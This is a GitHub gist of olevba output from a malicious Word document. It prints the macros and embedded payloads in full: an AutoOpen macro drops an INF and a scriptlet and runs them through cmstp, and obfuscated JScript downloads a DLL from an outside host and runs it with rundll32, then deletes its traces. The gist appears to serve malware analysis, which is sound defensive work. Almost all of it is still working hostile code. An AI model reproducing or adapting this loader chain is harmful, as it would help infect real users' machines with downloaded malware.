Last active
March 7, 2020 20:55
-
-
Save JohnLaTwC/0eea13346839629eb9c4f3b031bf48bb to your computer and use it in GitHub Desktop.
Word maldoc
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| olevba 0.55.1 on Python 3.7.3 - http://decalage.info/python/oletools | |
| =============================================================================== | |
| FILE: 6f46291b6f2dc2de02fbfaca2cf0aa730f4d7d5b1ade581c7677ac0856bf1292 | |
| Type: OpenXML | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO ThisDocument.cls | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO at3yqQ.bas | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/at3yqQ' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Sub AutoOpen() | |
| main | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO aOVsDG.bas | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/aOVsDG' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| 'Private const aqtAGd As String = "ridniw" | |
| Public Function aGSs7A(aZ9yej, aSfZd) | |
| ' Liner guitar | |
| ' Ably alumina untenable | |
| ' Th forty-seven egotistical | |
| ' Payable powerseller maintaining | |
| ' Linda flawless msn | |
| ' Penis troy forger | |
| Open aZ9yej For Output As #1 | |
| Print #1, aSfZd | |
| Close #1 | |
| End Function | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO aYLcmV.bas | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/aYLcmV' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| #If VBA7 Then | |
| Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal Milliseconds As LongPtr) | |
| #Else | |
| Public Declare Sub Sleep Lib "kernel32" (ByVal Milliseconds As Long) | |
| #End If | |
| Sub main() | |
| ' Gauntlet side your | |
| ' Ostentatious message diffs lovers vagina | |
| ' Folder sapphire | |
| ' Fez | |
| ' Quilt maiden | |
| ' Gleeful cabinet plausibly | |
| Dim a2LdP | |
| Set a2LdP = frm.TextBox1 | |
| Dim aVUmKu | |
| Set aVUmKu = frm.TextBox2 | |
| Dim a94M6o | |
| Set a94M6o = frm.TextBox3 | |
| Set objWord = CreateObject("Word.Application") | |
| With objWord | |
| .Visible = False | |
| .Application.DisplayAlerts = False | |
| .Documents.Add | |
| .Selection.TypeText a94M6o.value | |
| .Selection.WholeStory | |
| .Selection.Copy | |
| ' Census creates | |
| End With | |
| ' Holmes | |
| ' Posterior | |
| ' Exceptions ref fundamentals | |
| aGSs7A "C:\ProgramData\afAV8.inf", a2LdP.value | |
| aGSs7A "C:\ProgramData\abh0Rg.sct", aVUmKu.value | |
| ' Commemorate rowdy san | |
| Sleep 3000 | |
| ' To enb lebanon | |
| ' Sep survival | |
| a9FMy6 = Shell("cmstp /ni /s C:\ProgramData\afAV8.inf") | |
| End Sub | |
| ------------------------------------------------------------------------------- | |
| VBA MACRO frm.frm | |
| in file: word/vbaProject.bin - OLE stream: 'VBA/frm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| (empty macro) | |
| ------------------------------------------------------------------------------- | |
| VBA FORM STRING IN 'word/vbaProject.bin' - OLE stream: 'frm/o' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=aVOhvn | |
| [aVOhvn] | |
| %11%\scrobj.dll,NI,C:\ProgramData\abh0Rg.sct | |
| [Strings] | |
| AppAct = "SOFTWARE\Microsoft\Connection Manager" | |
| ServiceName="aA5aKj" | |
| ShortSvcName="a2q8dw" | |
| ------------------------------------------------------------------------------- | |
| VBA FORM STRING IN 'word/vbaProject.bin' - OLE stream: 'frm/o' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration progid="aH6Oau" classid="{C4CA4238-A0B9-3382-8DCC-509A6F75849B}" > | |
| <script language="VBScript"> | |
| <![CDATA[ | |
| ' MsgBox "Successfully running process" | |
| ]]> | |
| </script> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| try | |
| { | |
| var text = new ActiveXObject("htmlfile").parentWindow.clipboardData.getData("text"); | |
| eval(text); | |
| } | |
| catch(e) {} | |
| ]]> | |
| </script> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| ]]> | |
| </script> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| avhZYf = false; | |
| var a7A5m = true; | |
| aie8C = "a86uX"; | |
| a6mGn8 = aie8C.toString(); | |
| var at8N4 = -23089; | |
| aUu1cq = 14993; | |
| var azUoNF = 58045; | |
| var adHaPl = "a6dgmU"; | |
| aPENS = adHaPl.toUpperCase(); | |
| aHw7dz = true; | |
| var aUC96B = false; | |
| ]]> | |
| </script> | |
| </registration> | |
| </scriptlet> | |
| ------------------------------------------------------------------------------- | |
| VBA FORM STRING IN 'word/vbaProject.bin' - OLE stream: 'frm/o' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| a48o6 = true;var aFP9A = "a20NBn";var auwWcO = false;aOMv0D = -4221;function adGbPA(ah7ov){var a2cCM = false;as6h1 = 1449;var aDKIk = 57391;var apa2Qh = "C:\\ProgramData\\agPh8m.dll";var aJjwuh = -24353;var aMnjkX = true;var aocn4 = new ActiveXObject("msxml2.xmlhttp");aXYdqM = 57955;var anFJy = "a28Aj";var a06FOC = false;aocn4.open("GET", ah7ov, 0);aV6uP = "afeyp";var aLnYO = aV6uP.toString();ai4mCt = "al4g76";var aLk0K = ai4mCt.toLowerCase();var ai1Uo = "aWht3j";afbrye = ai1Uo.length;var aPQKBA = -33300;var aOlxmp = -21203;aocn4.send();aMKL1 = -62250;aUi7qJ = -62358;if(aocn4.status === 200 && aocn4.readystate === 4){var ayxsc = "aI3N6";var a2ZDX1 = "aXLav";var al6oD = 28271;aSLd6 = false;var aIsb7h = new ActiveXObject("adodb.stream");aQC4X = "aJz4F";var aMxh7Z = -36247;aIsb7h.open();aSKLNw = true;a3bBH = false;aIsb7h.type = 1;var a4zST = false;var ajtgU = "ated8C";var a3JNlK = ajtgU.length;var acIiyB = -6633;aIsb7h.write(aocn4.responsebody);var aqeoHJ = "acfx2g";axZTk = aqeoHJ.toString();var a0ejF = "aMVtLY";var a0Xzf = a0ejF.length;var a2KvRY = true;aIsb7h.savetofile(apa2Qh, 2);aHK4L = 27133;var axr93C = -55379;aIsb7h.close();akbV4a = "aEaBx";var apfh4R = akbV4a.toString();var aLNk5w = "a6fs0i";var aYvth = aLNk5w.length;azJKn = "afn0Fo";a0FDg = azJKn.toString();var aN1hL = "a1VuY";var a9o3m = aN1hL.toString();var a45ap = true;aAuLz = "aGZRVk";var ay6bg = -41588;(new ActiveXObject("wscript.shell").run("rundll32 C:\\ProgramData\\agPh8m.dll, DllRegisterServer"));a8mduH = true;var alNYG = "a7VaI";aZ8Qo = alNYG.toUpperCase();try{aT2PXm.deletefile("C:\\ProgramData\\afAV8.inf");aT2PXm.deletefile("C:\\ProgramData\\abh0Rg.sct");}catch(e){}}}ayu7s = "ajPtT";var aI4jNC = "aXsdmU";var apEcXK = aI4jNC.toString();var aMOaPJ = false;var ah7ov = "http://vxmzf6f9i.com/nra962sc0/ft2dol9oy.php?l=cav11.cab";var a2jIC = 448;aQkM5 = -59906;aptAG1 = false;var afZmXe = "aucki";var ayM1o = new ActiveXObject("wscript.shell");var aT2PXm = new ActiveXObject("scripting.filesystemobject");a8aqhu = "arW5p";aXZkd = "aJzq6G";aVh0S = "aixT6";arwc0e = aVh0S.toUpperCase();aLasy = "aWoHv";var a3yRr = aLasy.length;aNIki = -41373;aeuFG = "a75Vj";apNHX = aeuFG.toString();aSCs0 = -27740;a1EVl = "a7SAet";acw6L = "a5U8D";var aCMO0 = acw6L.toUpperCase();a6mgkP = true;var aRCpLF = -50760;var azLdg = -63764;var ajf5g = "aMgRi";aiFx0C = ajf5g.length;var aXcqky = -58384;aTu54Z = 65260;var awmUu = true;ahTIu = -17237;anCOf4 = false;var a7Uic = false;a2ArVN = true;aE02b = -56593;var akYwAg = true;var aqaVKf = -33070;var aUeI8T = false;aVPlh = -27601;a2iCB = -64986;aNaRe = "aivxo";var a2nw6O = aNaRe.toString();var aCSKUV = "agkEO";ag2oP = aCSKUV.toString();aNTWSj = true;aXQLE = -51910;var aUvlM0 = "aDzJX";var ahBr39 = aUvlM0.toString();aSPGB = "aCTV2";aSJVL = 60238;amQXB = -20640;a9gxAK = -33364;aVYFH = 27694;adGbPA(ah7ov); | |
| ------------------------------------------------------------------------------- | |
| VBA FORM STRING IN 'word/vbaProject.bin' - OLE stream: 'frm/o' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| Tahoma} | |
| ------------------------------------------------------------------------------- | |
| VBA FORM Variable "b'TextBox1'" IN 'word/vbaProject.bin' - OLE stream: 'frm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| b'[version]\r\n\r\nSignature=$chicago$\r\nAdvancedINF=2.5\r\n\r\n[DefaultInstall_SingleUser]\r\n\r\nUnRegisterOCXs=aVOhvn\r\n\r\n[aVOhvn]\r\n\r\n%11%\\scrobj.dll,NI,C:\\ProgramData\\abh0Rg.sct\r\n\r\n[Strings]\r\n\r\nAppAct = "SOFTWARE\\Microsoft\\Connection Manager"\r\nServiceName="aA5aKj"\r\nShortSvcName="a2q8dw"\r\n' | |
| ------------------------------------------------------------------------------- | |
| VBA FORM Variable "b'TextBox2'" IN 'word/vbaProject.bin' - OLE stream: 'frm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| b'<?XML version="1.0"?>\r\n<scriptlet>\r\n<registration progid="aH6Oau" classid="{C4CA4238-A0B9-3382-8DCC-509A6F75849B}" > \r\n<script language="VBScript">\r\n<![CDATA[\r\n\' MsgBox "Successfully running process"\r\n]]>\r\n</script>\r\n<script language="JScript">\r\n<![CDATA[\r\ntry\r\n{\r\nvar text = new ActiveXObject("htmlfile").parentWindow.clipboardData.getData("text");\r\neval(text);\r\n}\r\ncatch(e) {}\r\n]]>\r\n</script>\r\n<script language="JScript">\r\n<![CDATA[ \r\n]]>\r\n</script>\r\n<script language="JScript">\r\n<![CDATA[ \r\navhZYf = false;\r\nvar a7A5m = true;\r\naie8C = "a86uX";\r\na6mGn8 = aie8C.toString();\r\nvar at8N4 = -23089;\r\naUu1cq = 14993;\r\nvar azUoNF = 58045;\r\nvar adHaPl = "a6dgmU";\r\naPENS = adHaPl.toUpperCase();\r\naHw7dz = true;\r\nvar aUC96B = false;\r\n]]>\r\n</script>\r\n</registration>\r\n</scriptlet>' | |
| ------------------------------------------------------------------------------- | |
| VBA FORM Variable "b'TextBox3'" IN 'word/vbaProject.bin' - OLE stream: 'frm' | |
| - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
| b'a48o6 = true;var aFP9A = "a20NBn";var auwWcO = false;aOMv0D = -4221;function adGbPA(ah7ov){var a2cCM = false;as6h1 = 1449;var aDKIk = 57391;var apa2Qh = "C:\\\\ProgramData\\\\agPh8m.dll";var aJjwuh = -24353;var aMnjkX = true;var aocn4 = new ActiveXObject("msxml2.xmlhttp");aXYdqM = 57955;var anFJy = "a28Aj";var a06FOC = false;aocn4.open("GET", ah7ov, 0);aV6uP = "afeyp";var aLnYO = aV6uP.toString();ai4mCt = "al4g76";var aLk0K = ai4mCt.toLowerCase();var ai1Uo = "aWht3j";afbrye = ai1Uo.length;var aPQKBA = -33300;var aOlxmp = -21203;aocn4.send();aMKL1 = -62250;aUi7qJ = -62358;if(aocn4.status === 200 && aocn4.readystate === 4){var ayxsc = "aI3N6";var a2ZDX1 = "aXLav";var al6oD = 28271;aSLd6 = false;var aIsb7h = new ActiveXObject("adodb.stream");aQC4X = "aJz4F";var aMxh7Z = -36247;aIsb7h.open();aSKLNw = true;a3bBH = false;aIsb7h.type = 1;var a4zST = false;var ajtgU = "ated8C";var a3JNlK = ajtgU.length;var acIiyB = -6633;aIsb7h.write(aocn4.responsebody);var aqeoHJ = "acfx2g";axZTk = aqeoHJ.toString();var a0ejF = "aMVtLY";var a0Xzf = a0ejF.length;var a2KvRY = true;aIsb7h.savetofile(apa2Qh, 2);aHK4L = 27133;var axr93C = -55379;aIsb7h.close();akbV4a = "aEaBx";var apfh4R = akbV4a.toString();var aLNk5w = "a6fs0i";var aYvth = aLNk5w.length;azJKn = "afn0Fo";a0FDg = azJKn.toString();var aN1hL = "a1VuY";var a9o3m = aN1hL.toString();var a45ap = true;aAuLz = "aGZRVk";var ay6bg = -41588;(new ActiveXObject("wscript.shell").run("rundll32 C:\\\\ProgramData\\\\agPh8m.dll, DllRegisterServer"));a8mduH = true;var alNYG = "a7VaI";aZ8Qo = alNYG.toUpperCase();try{aT2PXm.deletefile("C:\\\\ProgramData\\\\afAV8.inf");aT2PXm.deletefile("C:\\\\ProgramData\\\\abh0Rg.sct");}catch(e){}}}ayu7s = "ajPtT";var aI4jNC = "aXsdmU";var apEcXK = aI4jNC.toString();var aMOaPJ = false;var ah7ov = "http://vxmzf6f9i.com/nra962sc0/ft2dol9oy.php?l=cav11.cab";var a2jIC = 448;aQkM5 = -59906;aptAG1 = false;var afZmXe = "aucki";var ayM1o = new ActiveXObject("wscript.shell");var aT2PXm = new ActiveXObject("scripting.filesystemobject");a8aqhu = "arW5p";aXZkd = "aJzq6G";aVh0S = "aixT6";arwc0e = aVh0S.toUpperCase();aLasy = "aWoHv";var a3yRr = aLasy.length;aNIki = -41373;aeuFG = "a75Vj";apNHX = aeuFG.toString();aSCs0 = -27740;a1EVl = "a7SAet";acw6L = "a5U8D";var aCMO0 = acw6L.toUpperCase();a6mgkP = true;var aRCpLF = -50760;var azLdg = -63764;var ajf5g = "aMgRi";aiFx0C = ajf5g.length;var aXcqky = -58384;aTu54Z = 65260;var awmUu = true;ahTIu = -17237;anCOf4 = false;var a7Uic = false;a2ArVN = true;aE02b = -56593;var akYwAg = true;var aqaVKf = -33070;var aUeI8T = false;aVPlh = -27601;a2iCB = -64986;aNaRe = "aivxo";var a2nw6O = aNaRe.toString();var aCSKUV = "agkEO";ag2oP = aCSKUV.toString();aNTWSj = true;aXQLE = -51910;var aUvlM0 = "aDzJX";var ahBr39 = aUvlM0.toString();aSPGB = "aCTV2";aSJVL = 60238;amQXB = -20640;a9gxAK = -33364;aVYFH = 27694;adGbPA(ah7ov);' | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment